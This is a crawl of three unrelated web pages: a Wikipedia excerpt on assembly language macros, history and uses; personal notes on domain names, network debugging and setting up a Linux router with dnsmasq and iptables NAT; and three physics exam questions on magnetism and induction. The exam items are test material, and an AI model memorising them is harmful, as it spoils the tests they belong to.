Despite the power of macro processing, it fell into disuse in many high level languages (major exceptions being C, C++ and PL/I) while remaining a perennial for assemblers.
Macro parameter substitution is strictly by name: at macro processing time, the value of a parameter is textually substituted for its name. The most famous class of bugs resulting was the use of a parameter that itself was an expression and not a simple name when the macro writer expected a name. In the macro:
foo: macro a load a*b
the intention was that the caller would provide the name of a variable, and the "global" variable or constant b would be used to multiply "a". If foo is called with the parameter
a-c, the macro expansion of
load a-c*b occurs. To avoid any possible ambiguity, users of macro processors can parenthesize formal parameters inside macro definitions, or callers can parenthesize the input parameters.
Support for structured programming
Packages of macros have been written providing structured programming elements to encode execution flow. The earliest example of this approach was in the Concept-14 macro set, originally proposed by Harlan Mills (March 1970), and implemented by Marvin Kessler at IBM's Federal Systems Division, which provided IF/ELSE/ENDIF and similar control flow blocks for OS/360 assembler programs. This was a way to reduce or eliminate the use of GOTO operations in assembly code, one of the main factors causing spaghetti code in assembly language. This approach was widely accepted in the early 1980s (the latter days of large-scale assembly language use). IBM's High Level Assembler Toolkit includes such a macro package.
A curious design was A-Natural, a "stream-oriented" assembler for 8080/Z80, processors from Whitesmiths Ltd. (developers of the Unix-like Idris operating system, and what was reported to be the first commercial C compiler). The language was classified as an assembler because it worked with raw machine elements such as opcodes, registers, and memory references; but it incorporated an expression syntax to indicate execution order. Parentheses and other special symbols, along with block-oriented structured programming constructs, controlled the sequence of the generated instructions. A-natural was built as the object language of a C compiler, rather than for hand-coding, but its logical syntax won some fans.
There has been little apparent demand for more sophisticated assemblers since the decline of large-scale assembly language development. In spite of that, they are still being developed and applied in cases where resource constraints or peculiarities in the target system's architecture prevent the effective use of higher-level languages.
Assemblers with a strong macro engine allow structured programming via macros, such as the switch macro provided with the Masm32 package (this code is a complete program):
include \masm32\include\masm32rt.inc ; use the Masm32 library .code demomain: REPEAT 20 switch rv(nrandom, 9) ; generate a number between 0 and 8 mov ecx, 7 case 0 print "case 0" case ecx ; in contrast to most other programming languages, print "case 7" ; the Masm32 switch allows "variable cases" case 1 .. 3 .if eax==1 print "case 1" .elseif eax==2 print "case 2" .else print "cases 1 to 3: other" .endif case 4, 6, 8 print "cases 4, 6 or 8" default mov ebx, 19 ; print 20 stars .Repeat print "*" dec ebx .Until Sign? ; loop until the sign flag is set endsw print chr$(13, 10) ENDM exit end demomain
Use of assembly language
Assembly languages were not available at the time when the stored-program computer was introduced. Kathleen Booth "is credited with inventing assembly language" based on theoretical work she began in 1947, while working on the ARC2 at Birkbeck, University of London following consultation by Andrew Booth (later her husband) with mathematician John von Neumann and physicist Herman Goldstine at the Institute for Advanced Study.
In late 1948, the Electronic Delay Storage Automatic Calculator (EDSAC) had an assembler (named "initial orders") integrated into its bootstrap program. It used one-letter mnemonics developed by David Wheeler, who is credited by the IEEE Computer Society as the creator of the first "assembler". Reports on the EDSAC introduced the term "assembly" for the process of combining fields into an instruction word. SOAP (Symbolic Optimal Assembly Program) was an assembly language for the IBM 650 computer written by Stan Poley in 1955.
Assembly languages eliminate much of the error-prone, tedious, and time-consuming first-generation programming needed with the earliest computers, freeing programmers from tedium such as remembering numeric codes and calculating addresses. They were once widely used for all sorts of programming. However, by the late 1950s, their use had largely been supplanted by higher-level languages, in the search for improved programming productivity. Today, assembly language is still used for direct hardware manipulation, access to specialized processor instructions, or to address critical performance issues. Typical uses are device drivers, low-level embedded systems, and real-time systems (see § Current usage).
Numerous programs have been written entirely in assembly language. The Burroughs MCP (1961) was the first computer for which an operating system was not developed entirely in assembly language; it was written in Executive Systems Problem Oriented Language (ESPOL), an Algol dialect. Many commercial applications were written in assembly language as well, including a large amount of the IBM mainframe software written by large corporations. COBOL, FORTRAN and some PL/I eventually displaced much of this work, although a number of large organizations retained assembly-language application infrastructures well into the 1990s.
Assembly language has long been the primary development language for 8-bit home computers such Atari 8-bit family, Apple II, MSX, ZX Spectrum, and Commodore 64. Interpreted BASIC dialects on these systems offer insufficient execution speed and insufficient facilities to take full advantage of the available hardware. These systems have severe resource constraints, idiosyncratic memory and display architectures, and provide limited system services. There are also few high-level language compilers suitable for microcomputer use. Similarly, assembly language is the default choice for 8-bit consoles such as the Atari 2600 and Nintendo Entertainment System.
Key software for IBM PC compatibles was written in assembly language, such as MS-DOS, Turbo Pascal, and the Lotus 1-2-3 spreadsheet. As computer speed grew exponentially, assembly language became a tool for speeding up parts of programs, such as the rendering of Doom, rather than a dominant development language. In the 1990s, assembly language was used to get performance out of systems such as the Sega Saturn and as the primary language for arcade hardware based on the TMS34010 integrated CPU/GPU such as Mortal Kombat and NBA Jam.
There has been debate over the usefulness and performance of assembly language relative to high-level languages.
Although assembly language has specific niche uses where it is important (see below), there are other tools for optimization.
As of July 2017[update], the TIOBE index of programming language popularity ranks assembly language at 11, ahead of Visual Basic, for example. Assembler can be used to optimize for speed or optimize for size. In the case of speed optimization, modern optimizing compilers are claimed to render high-level languages into code that can run as fast as hand-written assembly, despite the counter-examples that can be found. The complexity of modern processors and memory sub-systems makes effective optimization increasingly difficult for compilers, as well as for assembly programmers. Moreover, increasing processor performance has meant that most CPUs sit idle most of the time, with delays caused by predictable bottlenecks such as cache misses, I/O operations and paging. This has made raw code execution speed a non-issue for many programmers.
There are some situations in which developers might choose to use assembly language:
- Writing code for systems with older processors[clarification needed] that have limited high-level language options such as the Atari 2600, Commodore 64, and graphing calculators. Programs for these computers of the 1970s and 1980s are often written in the context of demoscene or retrogaming subcultures.
- Code that must interact directly with the hardware, for example in device drivers and interrupt handlers.
- In an embedded processor or DSP, high-repetition interrupts require the shortest number of cycles per interrupt, such as an interrupt that occurs 1000 or 10000 times a second.
- Programs that need to use processor-specific instructions not implemented in a compiler. A common example is the bitwise rotation instruction at the core of many encryption algorithms, as well as querying the parity of a byte or the 4-bit carry of an addition.
- A stand-alone executable of compact size is required that must execute without recourse to the run-time components or libraries associated with a high-level language. Examples have included firmware for telephones, automobile fuel and ignition systems, air-conditioning control systems, security systems, and sensors.
- Programs with performance-sensitive inner loops, where assembly language provides optimization opportunities that are difficult to achieve in a high-level language. For example, linear algebra with BLAS or discrete cosine transformation (e.g. SIMD assembly version from x264).
- Programs that create vectorized functions for programs in higher-level languages such as C. In the higher-level language this is sometimes aided by compiler intrinsic functions which map directly to SIMD mnemonics, but nevertheless result in a one-to-one assembly conversion specific for the given vector processor.
- Real-time programs such as simulations, flight navigation systems, and medical equipment. For example, in a fly-by-wire system, telemetry must be interpreted and acted upon within strict time constraints. Such systems must eliminate sources of unpredictable delays, which may be created by (some) interpreted languages, automatic garbage collection, paging operations, or preemptive multitasking. However, some higher-level languages incorporate run-time components and operating system interfaces that can introduce such delays. Choosing assembly or lower level languages for such systems gives programmers greater visibility and control over processing details.
- Cryptographic algorithms that must always take strictly the same time to execute, preventing timing attacks.
- Video encoders and decoders such as rav1e (an encoder for AV1) and dav1d (the reference decoder for AV1) contain assembly to leverage AVX2 and ARM Neon instructions when available.
- Modify and extend legacy code written for IBM mainframe computers.
- Situations where complete control over the environment is required, in extremely high-security situations where nothing can be taken for granted.
- Computer viruses, bootloaders, certain device drivers, or other items very close to the hardware or low-level operating system.
- Instruction set simulators for monitoring, tracing and debugging where additional overhead is kept to a minimum.
- Situations where no high-level language exists, on a new or specialized processor for which no cross compiler is available.
- Reverse-engineering and modifying program files such as:
- existing binaries that may or may not have originally been written in a high-level language, for example when trying to recreate programs for which source code is not available or has been lost, or cracking copy protection of proprietary software.
- Video games (also termed ROM hacking), which is possible via several methods. The most widely employed method is altering program code at the assembly language level.
Assembly language is still taught in most computer science and electronic engineering programs. Although few programmers today regularly work with assembly language as a tool, the underlying concepts remain important. Such fundamental topics as binary arithmetic, memory allocation, stack processing, character set encoding, interrupt processing, and compiler design would be hard to study in detail without a grasp of how a computer operates at the hardware level. Since a computer's behavior is fundamentally defined by its instruction set, the logical way to learn such concepts is to study an assembly language. Most modern computers have similar instruction sets. Therefore, studying a single assembly language is sufficient to learn: I) the basic concepts; II) to recognize situations where the use of assembly language might be appropriate; and III) to see how efficient executable code can be created from high-level languages.
- Assembly language is typically used in a system's boot code, the low-level code that initializes and tests the system hardware prior to booting the operating system and is often stored in ROM. (BIOS on IBM-compatible PC systems and CP/M is an example.)
- Assembly language is often used for low-level code, for instance for operating system kernels, which cannot rely on the availability of pre-existing system calls and must indeed implement them for the particular processor architecture on which the system will be running.
- Some compilers translate high-level languages into assembly first before fully compiling, allowing the assembly code to be viewed for debugging and optimization purposes.
- Some compilers for relatively low-level languages, such as Pascal or C, allow the programmer to embed assembly language directly in the source code (so called inline assembly). Programs using such facilities can then construct abstractions using different assembly language on each hardware platform. The system's portable code can then use these processor-specific components through a uniform interface.
- Assembly language is useful in reverse engineering. Many programs are distributed only in machine code form which is straightforward to translate into assembly language by a disassembler, but more difficult to translate into a higher-level language through a decompiler. Tools such as the Interactive Disassembler make extensive use of disassembly for such a purpose. This technique is used by hackers to crack commercial software, and competitors to produce software with similar results from competing companies.
- Assembly language is used to enhance speed of execution, especially in early personal computers with limited processing power and RAM.
- Assemblers can be used to generate blocks of data, with no high-level language overhead, from formatted and commented source code, to be used by other code.
- Comparison of assemblers
- Instruction set architecture
- Little man computer – an educational computer model with a base-10 assembly language
- Typed assembly language
- ^ Other than meta-assemblers
- ^ However, that does not mean that the assembler programs implementing those languages are universal.
- ^ "Used as a meta-assembler, it enables the user to design his own programming languages and to generate processors for such languages with a minimum of effort."
- ^ This is one of two redundant forms of this instruction that operate identically. The 8086 and several other CPUs from the late 1970s/early 1980s have redundancies in their instruction sets, because it was simpler for engineers to design these CPUs (to fit on silicon chips of limited sizes) with the redundant codes than to eliminate them (see don't-care terms). Each assembler will typically generate only one of two or more redundant instruction encodings, but a disassembler will usually recognize any of them.
- ^ AMD manufactured second-source Intel 8086, 8088, and 80286 CPUs, and perhaps 8080A and/or 8085A CPUs, under license from Intel, but starting with the 80386, Intel refused to share their x86 CPU designs with anyone—AMD sued about this for breach of contract—and AMD designed, made, and sold 32-bit and 64-bit x86-family CPUs without Intel's help or endorsement.
- ^ In 7070 Autocoder, a macro definition is a 7070 macro generator program that the assembler calls; Autocoder provides special macros for macro generators to use.
- ^ "The following minor restriction or limitation is in effect with regard to the use of 1401 Autocoder when coding macro instructions ..."
- ^ a b "Assembler language". High Level Assembler for z/OS & z/VM & z/VSE Language Reference Version 1 Release 6. IBM. 2014 . SC26-4940-06.
- ^ "Assembly: Review" (PDF). Computer Science and Engineering. College of Engineering, Ohio State University. 2016. Archived (PDF) from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Archer, Benjamin (November 2016). Assembly Language For Students. North Charleston, South Carolina, USA: CreateSpace Independent Publishing. ISBN 978-1-5403-7071-6.
Assembly language may also be called symbolic machine code.
- ^ Streib, James T. (2020). "Guide to Assembly Language". Undergraduate Topics in Computer Science. Cham: Springer International Publishing. doi:10.1007/978-3-030-35639-2. ISBN 978-3-030-35638-5. ISSN 1863-7310. S2CID 195930813.
Programming in assembly language has the same benefits as programming in machine language, except it is easier.
- ^ Saxon, James A.; Plette, William S. (1962). Programming the IBM 1401, a self-instructional programmed manual. Englewood Cliffs, New Jersey, USA: Prentice-Hall. LCCN 62-20615. (NB. Use of the term assembly program.)
- ^ Kornelis, A. F. (2010) . "High Level Assembler – Opcodes overview, Assembler Directives". Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ "Macro instructions". High Level Assembler for z/OS & z/VM & z/VSE Language Reference Version 1 Release 6. IBM. 2014 . SC26-4940-06.
- ^ Booth, Andrew D; Britten, Kathleen HV (1947). Coding for A.R.C. (PDF). Institute for Advanced Study, Princeton. Retrieved 2022-11-04.
- ^ Wilkes, Maurice Vincent; Wheeler, David John; Gill, Stanley J. (1951). The preparation of programs for an electronic digital computer (Reprint 1982 ed.). Tomash Publishers. ISBN 978-0-93822803-5. OCLC 313593586.
- ^ Fairhead, Harry (2017-11-16). "History of Computer Languages - The Classical Decade, 1950s". I Programmer. Archived from the original on 2020-01-02. Retrieved 2020-03-06.
- ^ "How do assembly languages depend on operating systems?". Stack Exchange. Stack Exchange Inc. 2011-07-28. Archived from the original on 2020-03-24. Retrieved 2020-03-24. (NB. System calls often vary, e.g. for MVS vs. VSE vs. VM/CMS; the binary/executable formats for different operating systems may also vary.)
- ^ Austerlitz, Howard (2003). "Computer Programming Languages". Data Acquisition Techniques Using PCs. Elsevier. pp. 326–360. doi:10.1016/b978-012068377-2/50013-9. ISBN 9780120683772.
Assembly language (or Assembler) is a compiled, low-level computer language. It is processor-dependent since it basically translates the Assembler's mnemonics directly into the commands a particular CPU understands, on a one-to-one basis. These Assembler mnemonics are the instruction set for that processor.
- ^ Carnes, Beau (2022-04-27). "Learn Assembly Language Programming with ARM". freeCodeCamp.org. Retrieved 2022-06-21.
Assembly language is often specific to a particular computer architecture so there are multiple types of assembly languages. ARM is an increasingly popular assembly language.
- ^ Brooks, Frederick P. (1986). "No Silver Bullet—Essence and Accident in Software Engineering". Proceedings of the IFIP Tenth World Computing Conference: 1069–1076.
- ^ Anguiano, Ricardo. "linux kernel mainline 4.9 sloccount.txt". Gist. Retrieved 2022-05-04.
- ^ Daintith, John, ed. (2019). "meta-assembler". A Dictionary of Computing. Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Xerox Data Systems (Oct 1975). Xerox Meta-Symbol Sigma 5-9 Computers Language and Operations Reference Manual (PDF). p. vi. Archived (PDF) from the original on 2022-10-09. Retrieved 2020-06-07.
- ^ Sperry Univac Computer Systems (1977). Sperry Univac Computer Systems Meta-Assembler (MASM) Programmer Reference (PDF). Archived (PDF) from the original on 2022-10-09. Retrieved 2020-06-07.
- ^ "How to Use Inline Assembly Language in C Code". gnu.org. Retrieved 2020-11-05.
- ^ a b c d Salomon, David (February 1993) . Written at California State University, Northridge, California, USA. Chivers, Ian D. (ed.). Assemblers and Loaders (PDF). Ellis Horwood Series In Computers And Their Applications (1 ed.). Chicester, West Sussex, UK: Ellis Horwood Limited / Simon & Schuster International Group. pp. 7, 237–238. ISBN 0-13-052564-2. Archived (PDF) from the original on 2020-03-23. Retrieved 2008-10-01. (xiv+294+4 pages)
- ^ Finlayson, Ian; Davis, Brandon; Gavin, Peter; Uh, Gang-Ryung; Whalley, David; Själander, Magnus; Tyson, Gary (2013). "Improving processor efficiency by statically pipelining instructions". Proceedings of the 14th ACM SIGPLAN/SIGBED conference on Languages, compilers and tools for embedded systems. pp. 33–44. doi:10.1145/2465554.2465559. ISBN 9781450320856. S2CID 8015812.
- ^ Beck, Leland L. (1996). "2". System Software: An Introduction to Systems Programming. Addison Wesley.
- ^ a b Hyde, Randall (September 2003) [1996-09-30]. "Foreword ("Why would anyone learn this stuff?") / Chapter 12 – Classes and Objects". The Art of Assembly Language (2 ed.). No Starch Press. ISBN 1-886411-97-2. Archived from the original on 2010-05-06. Retrieved 2020-06-22. Errata: (928 pages)
- ^ a b c d Intel Architecture Software Developer's Manual, Volume 2: Instruction Set Reference (PDF). Vol. 2. Intel Corporation. 1999. Archived from the original (PDF) on 2009-06-11. Retrieved 2010-11-18.
- ^ Ferrari, Adam; Batson, Alan; Lack, Mike; Jones, Anita (2018-11-19) [Spring 2006]. Evans, David (ed.). "x86 Assembly Guide". Computer Science CS216: Program and Data Representation. University of Virginia. Archived from the original on 2020-03-24. Retrieved 2010-11-18.
- ^ "The SPARC Architecture Manual, Version 8" (PDF). SPARC International. 1992. Archived from the original (PDF) on 2011-12-10. Retrieved 2011-12-10.
- ^ Moxham, James (1996). "ZINT Z80 Interpreter". Z80 Op Codes for ZINT. Archived from the original on 2020-03-24. Retrieved 2013-07-21.
- ^ Hyde, Randall. "Chapter 8. MASM: Directives & Pseudo-Opcodes" (PDF). The Art of Computer Programming. Archived (PDF) from the original on 2020-03-24. Retrieved 2011-03-19.
- ^ Users of 1401 Autocoder. Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Griswold, Ralph E. (1972). "Chapter 1". The Macro Implementation of SNOBOL4. San Francisco, California, USA: W. H. Freeman and Company. ISBN 0-7167-0447-1.
- ^ "Macros (C/C++), MSDN Library for Visual Studio 2008". Microsoft Corp. 2012-11-16. Archived from the original on 2020-03-24. Retrieved 2010-06-22.
- ^ Kessler, Marvin M. (1970-12-18). "*Concept* Report 14 - Implementation of Macros To Permit Structured Programming in OS/360". MVS Software: Concept 14 Macros. Gaithersburg, Maryland, USA: International Business Machines Corporation. Archived from the original on 2020-03-24. Retrieved 2009-05-25.
- ^ "High Level Assembler Toolkit Feature Increases Programmer Productivity". IBM. 1995-12-12. Announcement Letter Number: A95-1432.
- ^ Whitesmiths Ltd (1980-07-15). A-Natural Language Reference Manual.
- ^ "assembly language: Definition and Much More from Answers.com". answers.com. Archived from the original on 2009-06-08. Retrieved 2008-06-19.
- ^ Provinciano, Brian (2005-04-17). "NESHLA: The High Level, Open Source, 6502 Assembler for the Nintendo Entertainment System". Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Dufresne, Steven (2018-08-21). "Kathleen Booth: Assembling Early Computers While Inventing Assembly". Archived from the original on 2020-03-24. Retrieved 2019-02-10.
- ^ a b Booth, Andrew Donald; Britten, Kathleen Hylda Valerie (September 1947) [August 1947]. General considerations in the design of an all purpose electronic digital computer (PDF) (2 ed.). The Institute for Advanced Study, Princeton, New Jersey, USA: Birkbeck College, London. Archived (PDF) from the original on 2020-03-24. Retrieved 2019-02-10.
The non-original ideas, contained in the following text, have been derived from a number of sources, ... It is felt, however, that acknowledgement should be made to Prof. John von Neumann and to Dr. Herman Goldstein for many fruitful discussions ...
- ^ Campbell-Kelly, Martin (April 1982). "The Development of Computer Programming in Britain (1945 to 1955)". IEEE Annals of the History of Computing. 4 (2): 121–139. doi:10.1109/MAHC.1982.10016. S2CID 14861159.
- ^ Campbell-Kelly, Martin (1980). "Programming the EDSAC". IEEE Annals of the History of Computing. 2 (1): 7–36. doi:10.1109/MAHC.1980.10009.
- ^ "1985 Computer Pioneer Award 'For assembly language programming' David Wheeler".
- ^ Wilkes, Maurice Vincent (1949). "The EDSAC – an Electronic Calculating Machine". Journal of Scientific Instruments. 26 (12): 385–391. Bibcode:1949JScI...26..385W. doi:10.1088/0950-7671/26/12/301.
- ^ da Cruz, Frank (2019-05-17). "The IBM 650 Magnetic Drum Calculator". Computing History - A Chronology of Computing. Columbia University. Archived from the original on 2020-02-15. Retrieved 2012-01-17.
- ^ Collen, Morris F. (March–April 1994). "The Origins of Informatics". Journal of the American Medical Informatics Association. 1 (2): 96–97. doi:10.1136/jamia.1994.95236152. PMC 116189. PMID 7719803.
- ^ Pettus, Sam (2008-01-10). "SegaBase Volume 6 - Saturn". Archived from the original on 2008-07-13. Retrieved 2008-07-25.
- ^ Kauler, Barry (1997-01-09). Windows Assembly Language and Systems Programming: 16- and 32-Bit Low-Level Programming for the PC and Windows. CRC Press. ISBN 978-1-48227572-8. Retrieved 2020-03-24.
Always the debate rages about the applicability of assembly language in our modern programming world.
- ^ Hsieh, Paul (2020-03-24) [2016, 1996]. "Programming Optimization". Archived from the original on 2020-03-24. Retrieved 2020-03-24.
... design changes tend to affect performance more than ... one should not skip straight to assembly language until ...
- ^ "TIOBE Index". TIOBE Software. Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Rusling, David A. (1999) . "Chapter 2 Software Basics". The Linux Kernel. Archived from the original on 2020-03-24. Retrieved 2012-03-11.
- ^ a b Markoff, John Gregory (2005-11-28). "Writing the Fastest Code, by Hand, for Fun: A Human Computer Keeps Speeding Up Chips". The New York Times. Seattle, Washington, USA. Archived from the original on 2020-03-23. Retrieved 2010-03-04.
- ^ "Bit-field-badness". hardwarebug.org. 2010-01-30. Archived from the original on 2010-02-05. Retrieved 2010-03-04.
- ^ "GCC makes a mess". hardwarebug.org. 2009-05-13. Archived from the original on 2010-03-16. Retrieved 2010-03-04.
- ^ Hyde, Randall. "The Great Debate". Archived from the original on 2008-06-16. Retrieved 2008-07-03.
- ^ "Code sourcery fails again". hardwarebug.org. 2010-01-30. Archived from the original on 2010-04-02. Retrieved 2010-03-04.
- ^ Click, Cliff; Goetz, Brian. "A Crash Course in Modern Hardware". Archived from the original on 2020-03-24. Retrieved 2014-05-01.
- ^ "68K Programming in Fargo II". Archived from the original on 2008-07-02. Retrieved 2008-07-03.
- ^ "BLAS Benchmark-August2008". eigen.tuxfamily.org. 2008-08-01. Archived from the original on 2020-03-24. Retrieved 2010-03-04.
- ^ "x264.git/common/x86/dct-32.asm". git.videolan.org. 2010-09-29. Archived from the original on 2012-03-04. Retrieved 2010-09-29.
- ^ "rav1e/README.md at v0.6.3". GitHub. Archived from the original on 2023-02-21. Retrieved 2023-02-21.
- ^ "README.md · 1.1.0 · VideoLAN / dav1d". Archived from the original on 2023-02-21. Retrieved 2023-02-21.
- ^ Bosworth, Edward (2016). "Chapter 1 – Why Study Assembly Language". www.edwardbosworth.com. Archived from the original on 2020-03-24. Retrieved 2016-06-01.
- ^ "z/OS Version 2 Release 3 DFSMS Macro Instructions for Data Sets" (PDF). IBM. 2019-02-15. Archived (PDF) from the original on 2021-06-25. Retrieved 2021-09-14.
- ^ Paul, Matthias R. (2001) , "Specification and reference documentation for NECPINW", NECPINW.CPI - DOS code page switching driver for NEC Pinwriters (2.08 ed.), FILESPEC.TXT, NECPINW.ASM, EUROFONT.INC from NECPI208.ZIP, archived from the original on 2017-09-10, retrieved 2013-04-22
- ^ Paul, Matthias R. (2002-05-13). "[fd-dev] mkeyb". freedos-dev. Archived from the original on 2018-09-10. Retrieved 2018-09-10.
- Bartlett, Jonathan (2004). Programming from the Ground Up - An introduction to programming using linux assembly language. Bartlett Publishing. ISBN 0-9752838-4-7. Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- Britton, Robert (2003). MIPS Assembly Language Programming. Prentice Hall. ISBN 0-13-142044-5.
- Calingaert, Peter (1979) [1978-11-05]. Written at University of North Carolina at Chapel Hill. Horowitz, Ellis (ed.). Assemblers, Compilers, and Program Translation. Computer software engineering series (1st printing, 1st ed.). Potomac, Maryland, USA: Computer Science Press, Inc. ISBN 0-914894-23-4. ISSN 0888-2088. LCCN 78-21905. Retrieved 2020-03-20. (2+xiv+270+6 pages)
- Duntemann, Jeff (2000). Assembly Language Step-by-Step. Wiley. ISBN 0-471-37523-3.
- Kann, Charles W. (2015). "Introduction to MIPS Assembly Language Programming". Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- Kann, Charles W. (2021). "Introduction to Assembly Language Programming: From Soup to Nuts: ARM Edition"
- Norton, Peter; Socha, John (1986). Peter Norton's Assembly Language Book for the IBM PC. New York, USA: Brady Books.
- Singer, Michael (1980). PDP-11. Assembler Language Programming and Machine Organization. New York, USA: John Wiley & Sons.
- Sweetman, Dominic (1999). See MIPS Run. Morgan Kaufmann Publishers. ISBN 1-55860-410-3.
- Waldron, John (1998). Introduction to RISC Assembly Language Programming. Addison Wesley. ISBN 0-201-39828-1.
- Yurichev, Dennis (2020-03-04) . "Understanding Assembly Language (Reverse Engineering for Beginners)" (PDF). Archived (PDF) from the original on 2020-03-24. Retrieved 2020-03-24.
- "ASM Community Book". 2009. Archived from the original on 2013-05-30. Retrieved 2013-05-30. ("An online book full of helpful ASM info, tutorials and code examples" by the ASM Community, archived at the internet archive.)
- Assembly language at Curlie
- Unix Assembly Language Programming
- Linux Assembly
- PPR: Learning Assembly Language
- NASM – The Netwide Assembler (a popular assembly language)
- Assembly Language Programming Examples
- Authoring Windows Applications In Assembly Language
- Assembly Optimization Tips by Mark Larson
- The table for assembly language to machine code | <urn:uuid:ab281cb3-15e0-43e8-8611-467acab6fc25> | CC-MAIN-2023-14 | https://en.wikipedia.org/wiki/Assembly_language?rdfrom=https%3A%2F%2Fsegaretro.org%2Findex.php%3Ftitle%3DAssembly_language%26redirect%3Dno | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949506.62/warc/CC-MAIN-20230330225648-20230331015648-00005.warc.gz | en | 0.866577 | 14,697 | 3.875 | 4 |
Parts of the article is inspired by "Introduction to Networking - What do all these little things do" Series Kudo to Eli the Computer Guy
Domain name can contain:
subset of ascii characters: most domains
subset of unicode text characters:
.net, and other uncommon domains
some emoji characters: only
.ml was free to claim, but no way to get it now, but you can get some emoji domain name Here)
Note that for most browsers, only ascii characters are guaranteed to show up normally, others are converted to punycode. Here is 13 rules chrome browser decide to show punycode or unicode (in summary, these are allowed and these are not allowed.). And Here is FireFox's policy.
When a domain is converted to punycode, you will see
Some Greek character can show normally on Chrome: and most of them (except for \theta, can combine with numbers while still show unicode only, but \theta combined with number will be converted to punycode on Chrome).
https://2π.com/ is a domain that leverage Chrome's property.
Many things might go wrong with your internet connection, especially for someone like me who manually change internet settings in
resolve.conf or ip-table or some places that I don't even remember.
The best way to debug is
ping [url] works, if so, at least the remote machine is online and DNS resolves correctly
ping [ip] works
wget [url] works, if so, then everything should be fine. otherwise,
tcp connection isn't working
wget [ip] works
nslookup return correctly
ip route get [url] and check
ip route route table
boot up a fresh machine and see the difference in your routing table, if VPN is connected, you should get a
ppp0 in your routing table after a while.
The way you can connected to internet at your home is through the following devices:
[Device#1, Device#2, ...] -> (Wireless Access Point) -> Switch -> Firewall -> Router -> Modem -> ISP -> Rest of Internet
Note some devices above are logically multiple devices but sometimes physically one device. The product you buy to access Internet bundles all these devices.
Modem: translate analog signal to digital signal
Modem can receive signals from:
DSL (ADSL, SDSL, VDSL)
Fiber Optic (FIOS)
Point-to-point (P2P) Wireless
Wireless (3G, 4G, 5G)
IEEE 802.11(a, b, g, n):
802.11a: nobody use it, not compatible with any other standards
802.11b: slow, old
802.11g: faster, stabler, standard
802.11n: new, allow larger area, faster, built for real time communication
Hub: obsolete, split signal equally Switch:
unmanaged switch: hardcoded, no configuration
managed switch: can program switch
Switch need to match the speed of internet. Usually each building has one big switch.
Patch Panel: a layer between switch and exit point so that we can have a lot more exit points and some move connections around when they are not used.
Wireless Access Point: provides WiFi signal
Internet Service Provider: centralized institution that get you internet access
enterprice class: immediate response to issue
residential class: <5 days response to issue
Why not dynamic IP:
Email filters block emails sent from dynamic IP address
IP address change and you can't set up a server
Service Level Agreements (SLA): IPS guarantee I get certain speed 99% of time. An lawful agreement to prevent false advertisement. However, residential class seldom has such SLA. Advertised speed is not SLA.
In linux, DNS is controlled by
systemctl status resolvconf.service)
You change `/etc/network/interfaces
To see the changes, you mest reboot the server
For more detail, check this youtube
For Windows: Follow this guide.
For Linux: Follow this guide.
By default, packet forwarding is disabled in Linux systems. To enable it, open the file
/etc/sysctl.conf in your favorite editor and add the line,
net.ipv4.ip_forward = 1: M's kernel receives a packet whose destination IP address indicates it's not meant for M. What will it do? When
ip_forward=0, it thinks: "I don't know why this got sent to me and I don't really care. To the trash it goes!" With ip_
forward=1, "Hmm, this is not for me. But I know where the recipient is, so I'll just resend it with the correct MAC address."
$ sudo vi /etc/sysctl.conf # Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1
Install dnsmasq to serve IP addresses to the 192.168.2.0 network.
In the rest of this tutorial we will use enp1s0 for the Ethernet network device and wlp2s0 for the WiFi for the first computer. These may be different in your computer and you would need to replace these with the values obtained by running the ip link command in the steps given below.
Next we need to configure dnsmasq. Configuring dnsmasq by editing the
$ sudo vi /etc/dnsmasq.conf # Add the lines, interface=enp1s0 dhcp-range=192.168.2.100,192.168.2.200,24h
The next step is to configure the
enp1s0 interface. This is done by editing the
$ sudo vi /etc/network/interfaces auto lo iface lo inet loopback # Add the lines, auto enp1s0 iface enp1s0 inet static address 192.168.2.1 network 192.168.2.0 netmask 255.255.255.0 broadcast 192.168.2.255
Next, create the file,
/etc/network/if-pre-up.d/router_firewall, using a text editor with superuser privileges (e.g.,
sudo vi /etc/network/if-pre-up.d/router_firewall), and with contents as given below. As mentioned above, this file uses enp1s0 for Ethernet NIC device file and wlp2s0 for the WiFi device file, which you might need to change if the values on your computer are different.
#!/bin/bash # # script for source Network Address Translation using iptables # iptables -F iptables -t nat -F iptables -X iptables -N val_input iptables -N val_output # allow packets with NEW, ESTABLISHED and RELATED states iptables -A val_input -m state --state NEW,ESTABLISHED,RELATED -i lo -j RETURN iptables -A val_output -m state --state NEW,ESTABLISHED,RELATED -o lo -j RETURN iptables -A val_input -m state --state NEW,ESTABLISHED,RELATED -i enp1s0 -j RETURN iptables -A val_output -m state --state NEW,ESTABLISHED,RELATED -o enp1s0 -j RETURN iptables -A val_input -m state --state NEW,ESTABLISHED,RELATED -i wlp2s0 -j RETURN iptables -A val_output -m state --state NEW,ESTABLISHED,RELATED -o wlp2s0 -j RETURN iptables -A val_input -j DROP iptables -A val_output -j DROP iptables -A INPUT -p tcp -j val_input iptables -A OUTPUT -p tcp -j val_output iptables -t nat -A POSTROUTING -o wlp2s0 -j MASQUERADE
iptables commands are described in the iptables tutorial. Next, make the file,
sudo chmod +x /etc/network/if-pre-up.d/router_firewall
Table of Content | <urn:uuid:5850f3b9-0710-46ef-ae96-17fe5dc0e5f1> | CC-MAIN-2023-14 | https://kokecacao.me/page/Post/TCP-IP.md | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949035.66/warc/CC-MAIN-20230329213541-20230330003541-00405.warc.gz | en | 0.808305 | 2,017 | 2.78125 | 3 |
The space inside a straight current carrying solenoid is filled with a magnetic material having magnetic susceptibility equal to 1.2 $$\times$$ 10$$-$$5. What is fractional increase in the magnetic field inside solenoid with respect to air as medium inside the solenoid?
Two parallel, long wires are kept 0.20 m apart in vacuum, each carrying current of x A in the same direction. If the force of attraction per meter of each wire is 2 $$\times$$ 10$$-$$6 N, then the value of x is approximately :
A coil is placed in a time varying magnetic field. If the number of turns in the coil were to be halved and the radius of wire doubled, the electrical power dissipated due to the current induced in the coil would be :
